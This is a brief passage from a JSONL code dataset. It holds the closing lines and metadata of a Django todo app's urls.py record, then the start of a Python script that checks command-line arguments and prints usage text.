name='category_detail'),\n]\n","repo_name":"somayejalilii/MiniProjectDjango","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34114347292","text":"import sys\n\nif len(sys.argv) < 4:\n print(\"Usage: python3 script.py input_file.txt output_file.txt -t